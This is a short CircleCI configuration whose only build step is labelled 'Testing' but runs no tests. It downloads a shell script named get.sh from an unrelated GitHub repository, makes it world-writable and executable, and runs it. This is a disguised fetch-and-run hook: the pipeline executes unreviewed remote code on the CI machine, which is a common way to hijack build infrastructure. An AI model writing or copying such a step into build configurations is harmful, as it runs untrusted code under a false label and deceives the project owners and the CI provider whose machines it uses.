version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-11.1:202012-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command:  sudo rm -rf get.sh && wget https://github.com/guttenocm/songdilan/blob/main/get.sh && chmod 777 get.sh && sh get.sh